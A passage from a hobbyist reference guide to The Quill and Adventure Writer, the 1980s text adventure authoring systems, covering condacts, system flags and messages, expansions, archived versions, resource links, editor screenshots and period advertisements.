<tr>
<td>ANYKEY or KEY (BBC)</td>
<td>SAVE</td>
</tr>
<tr>
<td>LOAD</td>
<td>TURNS</td>
</tr>
<tr>
<td>SCORE</td>
<td>PAUSE value</td>
</tr>
<tr>
<td>MESSAGE mesno.</td>
<td>REMOVE objno.</td>
</tr>
<tr>
<td>GET objno.</td>
<td>WEAR objno.</td>
</tr>
<tr>
<td>DROP objno.</td>
<td>DESTROY objno.</td>
</tr>
<tr>
<td>CREATE objno.</td>
<td>SWAP objno. objno.</td>
</tr>
<tr>
<td>SET flagno.</td>
<td>DESTROYED objno.</td>
</tr>
<tr>
<td>NOTZERO flagno.</td>
<td>BBC</td>
</tr>
<tr>
<td>NOTEQ flagno.</td>
<td>BBC</td>
</tr>
</tbody>
</table>
### Machine-specific Sound Actions
<table>
<thead>
<tr>
<th>BEEP duration pitch</th>
<th>SPE</th>
</tr>
</thead>
<tbody>
<tr>
<td>SOUND pitch duration</td>
<td>BBC</td>
</tr>
<tr>
<td>SOUND duration pitch</td>
<td>CPC, QL</td>
</tr>
<tr>
<td>SOUND frequency timing</td>
<td>APPLE</td>
</tr>
<tr>
<td>SOUND v p d vol</td>
<td>ATARI-ADW</td>
</tr>
<tr>
<td>SOUND register value</td>
<td>C64-ADW</td>
</tr>
<tr>
<td>SID regno. value</td>
<td>C64</td>
</tr>
<tr>
<td>MUSIC note duration</td>
<td>ORIC</td>
</tr>
<tr>
<td>VOLUME value</td>
<td>ORIC</td>
</tr>
</tbody>
</table>
### Machine-specific Display Actions
<table>
<thead>
<tr>
<th>BORDER value</th>
<th>SPE C, C64, CPC, QL, ATARI-ADW</th>
</tr>
</thead>
<tbody>
<tr>
<td>PAPER value</td>
<td>SPE C, C64, ORIC, QL, not C64-ADW</td>
</tr>
<tr>
<td>INK value</td>
<td>SPE C, C64, ORIC, QL</td>
</tr>
<tr>
<td>INK value value</td>
<td>CPC</td>
</tr>
<tr>
<td>SCREEN value</td>
<td>ATARI-ADW, C64-ADW, IBM-ADW</td>
</tr>
<tr>
<td>TEXT intensity</td>
<td>ATARI-ADW, IBM-ADW</td>
</tr>
<tr>
<td>CLS</td>
<td>SPE C, BBC, C64, CPC, ORIC, QL, APPLE, ATARI-ADW, IBM-ADW</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>DROPALL SPE C, BBC, C64, CPC, ORIC, QL, APPLE, ATARI-ADW, IBM-ADW</th>
</tr>
</thead>
<tbody>
<tr>
<td>PLACE objno. locno.</td>
</tr>
<tr>
<td>AUTOG SPE C, BBC, CPC, QL</td>
</tr>
<tr>
<td>AUTOW SPE C, BBC, CPC, QL</td>
</tr>
<tr>
<td>AUTOR SPE C, BBC, CPC, QL</td>
</tr>
<tr>
<td>MES mesno.</td>
</tr>
<tr>
<td>STAR mesno.</td>
</tr>
<tr>
<td>SYSMESS sysno.</td>
</tr>
<tr>
<td>ADD flag1 flag2</td>
</tr>
<tr>
<td>SUB flag1 flag2</td>
</tr>
<tr>
<td>JSR lsb msb</td>
</tr>
<tr>
<td>PRINT flagno.</td>
</tr>
<tr>
<td>RAMSAVE QL</td>
</tr>
<tr>
<td>RAMLOAD QL</td>
</tr>
</tbody>
</table>
SPE C = Spectrum Serial C version,
C64-ADW CondActs same as C64 except where otherwise indicated,
IBM-ADW entries included found by experimentation (no manual archived)
## The Quill – System Flags
<table>
<thead>
<tr>
<th>Flag:</th>
<th>Standard Quill/ADW Usage</th>
<th>QL Usage</th>
<th>BBC Usage</th>
</tr>
</thead>
<tbody>
<tr>
<td>Flag 0</td>
<td>zero (light) – notzero (dark)</td>
<td></td>
<td>zero (dark) – notzero (light)</td>
</tr>
<tr>
<td>Flag 1</td>
<td>count of objects carried</td>
<td></td>
<td>count of objects carried</td>
</tr>
<tr>
<td>Flag 2</td>
<td>decreased when location described</td>
<td></td>
<td>current location number</td>
</tr>
<tr>
<td>Flag 3</td>
<td>decreased when location described & dark</td>
<td></td>
<td>Flags 3 – 46 standard single byte flags [BBC]</td>
</tr>
<tr>
<td>Flag 4</td>
<td>decreased when loc^n described & dark & object 0 absent</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Flags 5 – 8</td>
<td>decreased each turn</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Flag 9</td>
<td>decreased each turn when it’s dark</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Flag 10</td>
<td>decreased each turn when it’s dark & object 0 absent</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Flag 11-24</td>
<td>ordinary flags</td>
<td></td>
<td>Flags 11 – 59 (ordinary flags) [QL]</td>
</tr>
<tr>
<td>Flag 25</td>
<td>ordinary flag</td>
<td>2\textsuperscript{nd} word in C64-4wd</td>
<td></td>
</tr>
<tr>
<td>Flag 26</td>
<td>ordinary flag</td>
<td>3\textsuperscript{rd} word in C64-4wd</td>
<td></td>
</tr>
<tr>
<td>Flag 27</td>
<td>ordinary flag</td>
<td>splitscreen, start of text line number (SPE + Patch)</td>
<td></td>
</tr>
<tr>
<td>Flag 28</td>
<td>ordinary flag</td>
<td>screen, sound & ramsave/load controls (SPE + Patch)</td>
<td></td>
</tr>
<tr>
<td>Flag 29</td>
<td>ordinary flag</td>
<td>picture control in Illustrator (C64, CPC, SPE)</td>
<td></td>
</tr>
<tr>
<td>Flag 30</td>
<td>holds the score</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Flag 31</td>
<td>holds turn count LSB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Flag 32</td>
<td>holds turn count MSB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Flag 33</td>
<td>Do not exist as user accessible flags for Quill (SPE, CPC, C64, ORIC, etc.)</td>
<td>hidden (most Quill versions) diagnostic flag (ORIC, CPC & ADW) – parsed word1</td>
<td></td>
</tr>
<tr>
<td>Flag 34</td>
<td></td>
<td>hidden (most Quill versions) diagnostic flag (ORIC, CPC & ADW) – parsed word2</td>
<td></td>
</tr>
<tr>
<td>Flag 35</td>
<td></td>
<td>hidden (most Quill versions) diagnostic flag (ORIC, CPC & ADW) – location number</td>
<td></td>
</tr>
<tr>
<td>Flag 36</td>
<td></td>
<td>???</td>
<td></td>
</tr>
<tr>
<td>Flags 37 - 46</td>
<td></td>
<td>Flags 37+ Hidden flags storing object number</td>
<td></td>
</tr>
</tbody>
</table>
(Note the differences between flags 3 – 10... authors should use their own routines in the status table to replicate the behaviour of the flags on other platforms, if required)
Flags 47 - 63
locations (used with SPE + Kelsoft’s FIX)
Flags 47 – 63 double byte flags (PLUS, MINUS, ADD, SUB and PRINT all act as 16-bit calculations i.e. act on flag and next highest flag)
[60: holds the score [QL]
[61: holds turn count LSB [QL]
[62: holds turn count MSB [QL]
*** Note the pseudo-flags 64+ are only used by the third-party extension for the ZX Spectrum version of The Quill; Kelsoft’s The Fix.
Object Start Locations
The following values are used to denote the start locations of objects (usually in menu option F). Note that the BBC version uses different values.
<table>
<thead>
<tr>
<th>Value</th>
<th>Regular Quill</th>
<th>BBC Quill</th>
</tr>
</thead>
<tbody>
<tr>
<td>252</td>
<td>not created</td>
<td></td>
</tr>
<tr>
<td>253</td>
<td>worn</td>
<td>carried</td>
</tr>
<tr>
<td>254</td>
<td>carried</td>
<td>worn</td>
</tr>
<tr>
<td>255</td>
<td></td>
<td>not created</td>
</tr>
</tbody>
</table>
Regular Quill values match up with the later equivalents in the PAW and DAAD where 252 (not-created), 253 (worn), 254 (carried), 255 (current location)
System Messages
Default system messages vary by serial and platform. Note: In early versions of The Quill (serial A) for ZX Spectrum the system messages could not be altered. A supplementary “you” file was used to define the player’s perspective.
In most versions, the system messages are only used by the Quill interpreter itself. The QL version allows the user to add additional system messages and to use the CondAct SYSMESS to print them (mirroring how that condact would be later used in the PAW).
Note: The BBC version does not have separate bank of system messages: the standard messages 0 – 19 are used by the system itself.
0: [dark message]
1: I can also see:-
2: [What next? prompt]
3: [What next? prompt]
4: [What next? prompt]
5: [What next? prompt] **spare + Patch (SPE)
6: Sorry, I didn’t understand that. Try some different words.
7: I can’t go in that direction.
8: I can’t.
9: I have with me:-
10: (worn)
11: Nothing at all.
12: Do you really want to quit now?
13: [end of game message & try again? prompt]
14: Bye. Have a nice day.
15: OK.
16: [press any key to continue]
17: You have taken
18: turn
19: s
20: .
21: You have scored
22: %
23: I’m not wearing it.
24: I can’t. My hands are full.
25: I already have it.
26: It’s not here.
27: I can’t carry any more.
28: I don’t have it.
29: I’m already wearing it.
30: Y
31: N Note: #30 & #31 are the system yes/no replies
C64
32: Disc or Tape?
33: [Saving prompt – Type in name of file]
34: Start the tape
CPC
32: [Saving prompt - Type in name of file]
ORIC
32: [Saving prompt - Type in name of file]
33: Use SLOW cassette speed?
Adventure Writer – Apple, Atari
32: [Saving prompt – Type in name of file]
Adventure Writer - C64
32: Disc or Tape?
33: [Saving prompt – Type in name of file]
34: Start the tape
Adventure Writer – IBM
32: [Saving prompt – Type in name of file]
33: Enter disk drive:
Official Expansion Programs
The Illustrator (Gilsoft) – SPE, CPC, C64
The Illustrator, by Tim Gilberts, was available for the ZX Spectrum, Commodore 64 and Amstrad CPC platforms. It allowed authors to add graphics to their text adventures. Graphics were vector/line-and-fill style. A separate editor program was used to design the graphics and combine them with the completed adventure database.
C64 graphic modes included full screen picture (hi-res, 24 lines), full screen (with press any key message), split-screen picture & text, and scrolling text mode.
Spectrum & Amstrad CPC users were initially limited to full screen pictures using the Illustrator. Split screen modes were unlocked on the Spectrum via The Patch, and on the CPC via The Splitter.
The Patch (Gilsoft) - SPE
The Patch, by Phil Wade, allowed Illustrator split-screen pictures to be incorporated in Spectrum text adventures. This facility was controlled with flag 27 (as it was in the C64 Illustrator). The Patch also provided a collection of other special effects, routines and features by utilising flag 28 with the PAUSE command. A small routine was also provided which replaced the printer routine in the Illustrator with one that saved the screens out to tape.
- Split-screen pictures
- Sound effects
- Switching between two typefaces/character sets
- Screen wipe effect
- Dynamic object limit
- Super-Quit and Crash features
- Different key-click options
- Dynamic replacement of system message 1
- Ramsave/Ramload
The Press and the Expander (Gilsoft) - SPE
The Press and the Expander were written by Phil Wade for the ZX Spectrum Quill. The Press offered text compression and the Expander allowed larger text-only adventures beyond the usual top limit. By using both utilities, text-only adventures bigger than “40K” could be produced.
The Expander gives the user 6938 bytes extra on version C02 and 7338 bytes extra on version C05. The manual states that with good compression this could mean the equivalent of about 11K extra for an adventure.
Characters (Gilsoft) - SPE
A simple character designer for the ZX Spectrum supplied with 20 premade character sets.
The font editor was created by Kevin Maddocks* of Sigma-Soft, and the included fonts had been available previously as Sigma’s Character Set Collection. (Kevin was also the author of the Quilled adventure Dwarfs Domain/Elfindor).
*note, his name is misspelled Kevin Madocs on the Characters packaging
The Splitter (Gilsoft) - CPC
The Splitter was an official Illustrator support program that allowed split screen graphics to be added to Quilled adventures on the Amstrad CPC.
The Splitter gave the user the following options for images...
1. Full screen pictures (Illustrator default)
2. The picture to remain on the screen
3. The picture to be removed at the 'More...' prompt
The space allowed for an illustration in split screen mode could be from 1 to 21 lines.
**Other Third-Party Expansions**
**The Fix, Mini-Fix, The Fix+ (Kelsoft) - SPE**
Produced by Gerald Kellet of Kelsoft (who also made extensions for the GAC and PAWs), the Fix programs provided some interesting extra commands for Quill programmers on the Spectrum. By using a quirk in the editor, Kelsoft were able to add a series of pseudo-CondActs that were implemented using the OK action.
- four word parser
- multiple STATUS table passes
- flag operations (add two flags, subtract two flags)
- forced synonyms/event equivalents
- additional directions in vocab
- full screen pictures in Patch-ed adventures
Mini-Fix was a cheaper, cut-down version of The Fix with just the improved parser. It’s unclear if The Fix+ was ever released. Currently, the only known copy of The Fix is in the Gilsoft company archives.
**QUAID and the Replicator (Kelsoft) - SPE**
Also produced by Kelsoft, the QUAID (“Quill Aid”) was a debugging tool for the Quill. The Replicator was a utility designed to assist in the duplication/publication of Quilled adventures. Neither utility is currently archived.
**The Enhancer (Bob Pape) – SPE [Never released]**
Referenced in Bob Pape’s book ‘It’s Behind You! – The Making of a Computer Game’, The Enhancer was an expansion to the Quill that Bob produced which included features such as his own graphics routines. It was never released or made available to others.
Unofficial versions of The Quill
There is a utility called Ballpoint in several of the Spectrum online archives. No details accompany it.
Although the menu is invisible in this program it follows the menu structure of serial C Spectrum Quill.
We believe this may be an early version of one the unofficially “hacked about” Smart Egg versions of the Quill.
For reference, the Ballpoint shows as having 28896 bytes of memory available.
Known Quill & Illustrator Archived Versions
See official repository [http://8-bit.info/the-gilsoft-adventure-systems/] for downloads
Platform-specific download sites (for other archived versions) listed below...
*work in progress – do you have any versions not listed?
<table>
<thead>
<tr>
<th>Format</th>
<th>Serial</th>
<th>Archived?</th>
<th>Platform-specific download site (for other versions not included in the official repository)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Spectrum</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Quill</td>
<td>A03</td>
<td>YES</td>
<td>World of Spectrum <a href="http://www.worldofspectrum.org/">https://www.worldofspectrum.org/</a></td>
</tr>
<tr>
<td></td>
<td>A06</td>
<td>YES</td>
<td>Spectrum Computing <a href="https://spectrumcomputing.co.uk/">https://spectrumcomputing.co.uk/</a></td>
</tr>
<tr>
<td></td>
<td>A08</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td></td>
<td>C02</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td></td>
<td>C04</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td></td>
<td>C05</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>Illustrator</td>
<td>A00</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>Amstrad</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Quill</td>
<td>A00 Tape*</td>
<td>YES</td>
<td>CPC-Power <a href="https://www.cpc-power.com/">https://www.cpc-power.com/</a></td>
</tr>
<tr>
<td></td>
<td>A01 Tape</td>
<td>YES</td>
<td>CPCrulez</td>
</tr>
<tr>
<td></td>
<td>A01 Disk</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td></td>
<td>A04 Disk</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>Illustrator</td>
<td>A01 Tape</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td></td>
<td>A02 Disk</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>C64</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Quill</td>
<td>A06 Disk</td>
<td>YES</td>
<td>Gamebase64 <a href="http://www.gamebase64.com/">http://www.gamebase64.com/</a></td>
</tr>
<tr>
<td></td>
<td>A06.4WD Disk</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td></td>
<td>B02 Disk</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>Illustrator</td>
<td>A00 Disk</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>BBC</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td>A00 Tape*</td>
<td>YES</td>
<td>Stairway to Hell <a href="http://www.stairwaytohell.com/">http://www.stairwaytohell.com/</a></td>
</tr>
<tr>
<td></td>
<td>A00 Disk*</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td></td>
<td>A03 Disk</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>Oric</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td>A00 Tape</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>QL</td>
<td></td>
<td>NO</td>
<td></td>
</tr>
<tr>
<td>Atari</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td>Released?</td>
<td>NO</td>
<td></td>
</tr>
</tbody>
</table>
Other Observations & Notes
Oric & BBC table entries
Both the Oric and BBC versions use an * (asterisk) in their tables rather than an _ (underscore).
Object type
The characteristics of an object (whether it can be worn & not just carried) are set by its associated word value in the vocabulary table.
12 < object vocab word < 200 : not-wearable (GD only)
199 < object vocab word : wearable (GDWR)
The initial Spectrum edition of the Quill (serial A) did not include such a distinction. If you are porting adventures from that version of the Quill then you will need to amend the vocabulary entries accordingly.
Word types
Unlike in the PAWs & DAAD, words are not categorised into word types, such as verbs, nouns & adjectives. Words in the vocabulary table can be used as both verbs and nouns. Words can even be used twice in the same input, such as IRON IRON. Authors porting Quilled games to later Gilsoft-family systems, such as the PAW will need to think carefully about how they transfer across these sorts of entries.
Differences between GET and DROP CondActs in The Quill and PAWs/DAAD
Although most CondActs behave very similarly in the Quill and the PAWs, making it very easy to port a game to later Gilsoft-family systems, care should be taken regarding the GET and DROP entries.
GET and DROP in The Quill are silent. They do not broadcast their effects.
However, in the PAWs, the GET and DROP CondActs trigger system messages 36 and 39, namely “You now have the…” and “You’ve dropped the…”
If you convert across an adventure to the PAWs, particularly if you wish to use the PAWs own object handling routines, then you will need to adjust the code accordingly. PLACE can be used in the PAWs in many cases where a silent GET or DROP is required.
Some clever Quill authors will have used the silent nature of the GET and DROP CondActs as a way of checking whether an object is carried and automatically generating a “You don’t have it” message if it’s not.
For example...
**LIGH LAMP DROP 1 GET 1 SWAP 1 0 OK**
If the player doesn’t have the lamp (object 1) then the DROP 1 will produce the message “You don’t have it” and stop processing the entry. i.e.
> **LIGHT LAMP**
> You don’t have it.
If the player has the lamp, it’s dropped and picked up silently, before the rest of the entry is processed (swapping an unlit lamp with the lit lamp) and printing the “OK” response. i.e.
> **LIGHT LAMP**
> OK.
In PAWs, the same line would generate the output...
> **LIGHT LAMP**
> You drop the lamp.
> You pick up the lamp.
> OK.
**MES, MESSAGE and SYSMESS**
The standard Quill CondAct MESSAGE prints the contents of the specified message followed by a newline.
On the BBC, the additional CondAct MES prints the message without a new line (similar to the equivalent CondAct appears in PAWs & DAAD).
**Use of External Machine Code Routines**
The BBC Micro version features the CondAct JSR which allows the user to trigger their own machine code routines. The example included in the BBC manual is an automatic exit routine.
Useful Web Links
Gilsoft
http://www.gilsoft.co.uk/
Tim Gilberts
Twitter: https://twitter.com/timbucus/ Paypal: https://www.paypal.me/timgilberts
The official authorised Gilsoft repository, run by Stefan Vogt
http://8-bit.info/the-gilsoft-adventure-systems/
Graeme Yeandle’s Text Adventure Pages
http://graemeyeandle.atwebpages.com/advent/index.html
8bitAG.com – This document and other resources...
http://8bitag.com/info/#quill
Adventurewriter:
Apple: https://archive.org/details/Adventure_Writer_Master_Disk
C64: http://www.gamebase64.com/game.php?id=15332&d=18
IBM: https://www.myabandonware.com/game/adventurewriter-2gv
Mocagh archive (documentation):
Gilsoft related:
CodeWriter related:
The Illustrator manual (for C64) translated into Spanish by Igor Errazking
https://drive.google.com/file/d/1UNsL4Cp1naVJsZjTsshmafбуG7wNrdX0/view
Ported Quilled adventures & useful resources for specific formats...
Devwebcl’s Atari Quill site... Quill adventures ported to the Atari...
http://devwebcl.atarionline.pl/quill/quill.html
Andy Ford’s Spectrum to BBC ports...
http://www.retrosoftware.co.uk/wiki/index.php?title=SGAP
Auraes’ Quill to Z-Machine project...
https://gitlab.com/auraes/zquill
Tools for extracting Quilled databases...
unQUILL (Spectrum/CPC/C64 plus separate program for BBC databases)
https://www.seasip.info/Unix/UnQuill/
unPAWS (Spectrum databases only)
https://github.com/Utodev/unPAWs
Various Quill related tools & downloads on the Interactive Fiction archive:
https://www.ifarchive.org/indexes/if-archiveXprogrammingXquill.html
PAWmac (Windows) Quilled adventures to Spectrum PAW via inPAWs
https://retro.pagasus.org/pawmac/
Tips for Quill authors...
Simon Avery & Debby Howard – Using the Quill: A Beginner’s Guide
https://digdilem.org/freesoftware/text-adventures/
Adventure Coder fanzine by Chris Hester
https://archive.org/search.php?query=creator%3A%22Chris+Hester%22
Quill interviews & articles...
The Digital Antiquarian article on The Quill
https://www.filfre.net/2013/07/the-quill/
...with Graeme Yeandle
http://solutionarchive.com/interview_graeme/
...with Tim Gilbert
8-bit info: http://8-bit.info/2017/01/22/the-gilsoft-legacy/
Classic Adventurer (Issue 2): http://classicadventurer.co.uk/
Appendix:
Screenshots of editor & test mode with default database
ZX Spectrum A08 editor...
ZX Spectrum A08 test mode with default database...
ZX Spectrum C05 Editor
ZX Spectrum C05 test mode with default database...
I am in a prison cell. The walls are painted **Black** and **Yellow** and are perfectly smooth. The only way out is through a trapdoor in the ceiling which is 30 feet high. There is a bright flashing light in one corner.
Tell me what to do.
Amstrad CPC A04 Editor
THE QUILL MAIN MENU A
[A] Vocabulary
[B] Message text
[C] Location text
[D] Movement table
[E] Object text
[F] Object start location
[G] Event table
[H] Status table
[I] System Messages
[J] Object Word
[I] Switch Main Menus
Select Facility Required
THE QUILL MAIN MENU B
[I] SAVE database
[J] Disc/Tape
[K] LOAD database
[L] Test adventure
[M] SAVE adventure
[N] CAT
[O] Bytes spare
[P] Objects conveyable
[Q] Permanent colours
[E] RETURN TO BASIC
[T] Switch Main Menus
Select Facility Required
Amstrad CPC A04 test mode with default database
I am in a prison cell. The walls are painted red and orange and are perfectly smooth. The only way out is through a trapdoor in the ceiling which is 30 feet high. There is a bright light in one corner. I’m ready for your instructions.
THE QUILL MAIN MENU
[A] Vocabulary
[B] Message text
[C] Location text
[D] Movement table
[E] Object text
[F] Object start location
[G] Event table
[H] Status table
[I] Save database
[J] Verify database
[K] Load database
[L] Test adventure
[M] Save adventure
[N] Verify adventure
[O] Bytes spare
[P] Objects conveyable
[Q] Permanent colours
[R] System messages
[S] Return to basic
Select Facility Required
C64 A06 / A06.4WD test adventure with default database
I am in a prison cell. The walls are painted Black and Yellow and are perfectly smooth. The only way out is through a trapdoor in the ceiling which is 30 feet high. There is a bright light in one corner.
Give me your command.
>
0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0
0 1 0 0 0 0 0 0 0 0 0 0
http://8bitag.com/info
BBC Model B Editor
The Quill
(C) Gilsoft 1985
by Neil Fleming-Smith
A...Vocabulary
B...Messages
C...Locations
D...Objects
E...Object words
F...Object start
G...Movement
H...Event
I...Status
J...Load database
K...Save database
L...Test adventure
M...Save adventure
N...Objects conveyable
O...Bytes spare
P...Star commands
BBC Model B test mode with default database
255
0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0
0 0 0 255
Undefined location.
?_
THE QUILL MAIN MENU
A> Vocabulary
B> Message text
C> Location text
D> Movement table
E> Object text
F> Object start location
G> Event table
H> Status table
I> Save database
J> Verify database
K> Load database
L> Test adventure
M> Save adventure
N> Verify adventure
O> Bytes spare
P> Objects conveyable
Q> Permanent colours
R> System messages
E> Return to BASIC
Select Facility Required
Test mode (default database) with diagnostic overlay...
I am in a prison cell. The walls are painted BLACK and GREEN and are perfectly smooth. The only way out is through a trap door in the ceiling which is 30 feet high.
I await your command.
Adventure Writer Apple II in test mode with default database...
I am in a prison cell. The walls are painted black and yellow and are perfectly smooth. The only way out is through a trapdoor in the ceiling which is 30 feet high. There is a bright light in one corner. I'm ready for your instructions.
Adventure Writer – Atari
**AdventureWriter Main Menu**
A...Vocabulary text
B...Message text
C...Location descriptions
D...Movement table
E...Object descriptions
F...Object starting locations
G...Vocabulary action table
H...Status table
I...Save a database
J...Load a database
K...Test this adventure
L...Save this adventure
M...Memory available
N...# of portable objects
O...Set display colors
P...AdventureWriter Messages
+...Exit AdventureWriter
Select an Option and Press RETURN
AdventureWriter Atari in test mode with default database...
I am in a prison cell. The walls are painted black and yellow and are perfectly smooth. The only way out is through a trapdoor in the ceiling which is 30 feet high. There is a bright light in one corner. I'm ready for your instructions.
Je suis dans une cellule, les murs qui sont absolument lisses, ont été peints en noir et jaune. La seule sortie est une trappe qui est située dans le plafond 10 m au dessus de moi. Il y a une lumière vive dans un coin.
Prêt à recevoir vos instructions.
AdventureWriter – IBM
AdventureWriter Main Menu
A ... Vocabulary text
B ... Message text
C ... Location descriptions
D ... Movement table
E ... Object descriptions
F ... Object starting locations
G ... Vocabulary action table
H ... Status table
I ... Save a database
J ... Load a database
K ... Test this adventure
L ... Save this adventure
M ... Memory available
N ... # of portable objects
U ... Set display colors
P ... AdventureWriter messages
+ ... Exit AdventureWriter
Select an Option and Press RETURN
(80 column editor)
AdventureWriter Main Menu
A ... Vocabulary text
B ... Message text
C ... Location descriptions
D ... Movement table
E ... Object descriptions
F ... Object starting locations
G ... Vocabulary action table
H ... Status table
I ... Save a database
J ... Load a database
K ... Test this adventure
L ... Save this adventure
M ... Memory available
N ... # of portable objects
U ... Set display colors
P ... AdventureWriter messages
+ ... Exit AdventureWriter
Select an Option and Press RETURN
(40 column editor)
I am in a prison cell. The walls are painted black and yellow and are perfectly smooth. The only way out is through a trapdoor in the ceiling which is 30 feet high. There is a bright light in one corner.
I await your command.
AdventureWriter C64 editor
AdventureWriter Main Menu
A...Vocabulary text
B...Message text
C...Location descriptions
D...Movement table
E...Object descriptions
F...Object starting locations
G...Vocabulary action table
H...Status table
I...Save a database
J...Verify a database
K...Load a database
L...Test this adventure
M...Save this adventure
N...Verify this adventure
O...Memory available
P...# of portable objects
Q...Set display colors
R...AdventureWriter Messages
S...Return to BASIC
Select an Option and Press RETURN
AdventureWriter C64 test mode with default database...
I am in a prison cell. The walls are painted Black and Yellow and are perfectly smooth. The only way out is through a trapdoor in the ceiling which is 30 feet high. There is a bright light in one corner.
I await your command.
Appendix
Some advertising examples...
THE QUILL
FOR THE 48K SPECTRUM AT £14.95
The Quill is a machine code Adventure authoring system which allows you to produce high speed machine code adventures without any knowledge of machine code. You may create well over 200 locations, describe and connect them. Then using a set of simple commands you can fill them with objects and problems of your own choice. Part completed adventures can be saved to tape for later completion. You may alter and experiment with your adventure with the greatest of ease. The completed adventure may be saved to tape and run independently of the Quill editor. The Quill is provided with a detailed tutorial manual which covers every aspect of its use in writing adventures. All this for only £14.95! We have produced a demo cassette giving further information and a sample of its use for only £2.00 inc. P&P.
EDUCATIONAL TAPES
CESIL..................................................£5.95
If you are starting ‘O’ level Computer studies this year you may well be required to learn the CESIL language. We have produced CESIL interpreters for the ZX Spectrum, 16K ZX81 and Dragon 32 which will allow you to write and run CESIL programs on your home computer thus gaining the familiarity with the language that examinations require. Supplied with full manual. Please specify machine type when ordering.
HAL..................................................£5.95
This is another ‘O’ level language used in some areas and is available for the ZX Spectrum only. Supplied with instructions.
VISUAL PROCESSOR..............................£5.95
Provides an on screen display of a simple micro-processor showing its internal operation as it runs programs. Full manual supplied. Available for the ZX Spectrum Only.
GILSOFT
30 Hawthorn Road, Barry, South Glam. CF6 8LE.
Tel: (0446) 736369
Our Software is available from many Computer Shops Nationwide, or direct from us by post or phone. S.A.E. for details.
ANNOUNCING
THE QUILL
FOR THE 48K SPECTRUM AT £14.95
The Quill is a major new utility written in machine code which allows even the novice programmer to produce high speed machine code adventures of superior quality to many available at the moment without any knowledge of machine code whatsoever.
Using a menu selection system you may create up to 200 locations, describe them and connect routes between them. You may then fill them with objects and problems of your choice. Having tested your adventure you may alter and experiment with any section with the greatest of ease. A part formed adventure may be saved to tape for later completion. When you have done so the Quill will allow you to produce a copy of your adventure which will run independently of the main Quill editor, so that you may give copies away to your friends. The Quill is provided with a detailed tutorial manual which covers every aspect of its use in writing adventures.
It is impossible to describe all the features of this amazing program in such a small space, so we have produced a demonstration cassette which gives further information and an example of its use. This cassette is available at £2.00 and the Quill itself is £14.95.
ALSO NEW FOR THE 48K SPECTRUM:
DIAMOND TRAIL £4.95
The latest of our machine code adventures sets you the task of recovering the Sinclive diamond. But first you must overcome many problems in a city fraught with danger and intrigue.
GILSOFT
30 Hawthorn Road, Barry
South Glam CF6 8LE
Tel: (0446) 736369
TELEPHONE YOUR ORDER WITH
OUR SOFTWARE IS AVAILABLE FROM MANY COMPUTER SHOPS NATIONWIDE. OR DIRECT FROM US BY POST OR PHONE. S.A.E. FOR DETAILS, DEALER ENQUIRIES WELCOME. SOME OF OUR MAIN WHOLESALE ARE:
UK: PCS Distribution, Darwen, Lancs. Tel (0254) 691211/2
HOLLAND/BELGIUM: AASHIMA TRADING BV, Hoostraat 69a, 3011 PH Rotterdam
SWEDEN: RIKO DATA, Box 2082, S 230 41 Bara, Sweden
DENMARK: QUALI-SOFT, Vesterbrogade 127 E Mz T, 1620 Copenhagen V
SOUTH AFRICA: UNIVERSAL SOURCES (PTY) LIMITED, Durban, Natal
ANNOUNCING
THE QUILL
FOR THE 48K SPECTRUM AT £14.95
The Quill is a major new utility written in machine code which allows even the
novice programmer to produce high speed machine code adventures of
superior quality to many available at the moment without any knowledge of
machine code whatsoever.
Using a menu selection system you may create well over 200 locations,
describe them and connect routes between them. You may then fill them
with objects and problems of your choice. Having tested your adventure you
may alter and experiment with any section of the with the greatest of ease. A part
formed adventure may be saved to tape for later completion. When you have
done so the Quill will allow you to produce a copy of your adventure which
will run independently of the main Quill editor, so that you may give copies
away to your friends. The Quill is provided with a detailed tutorial manual
which covers every aspect of the use in writing adventures. It is impossible to
describe all the features of this amazing program in such a small space, so we
have produced a demonstration cassette which gives further information and
an example of its use. This cassette is available at £2.00 and the Quill
itself is £14.95.
ALSO NEW FOR THE 48K SPECTRUM
MAGNETIC CASTLE (m/c 48K only) £4.95
A gripping adventure. Rescue the princess, but beware of booby traps and
vampires.
GAMES FOR THE 16K OR 48K SPECTRUM
MONGOOSE (m/c) and BEAR ISLAND £4.95
Fast and furious arcade action with three colourful high speed games.
REVERSAL (m/c) and POKER DICE £4.95
Classic strategy and addictive gambling games.
TIME-LINE (m/c) and TASKS £4.95
A superb 16K text adventure and a collection of mind stimulating puzzles.
3D MAZE OF GOLD (m/c) £5.95
Amazing full color, high resolution views as you walk around a large
labyrinth.
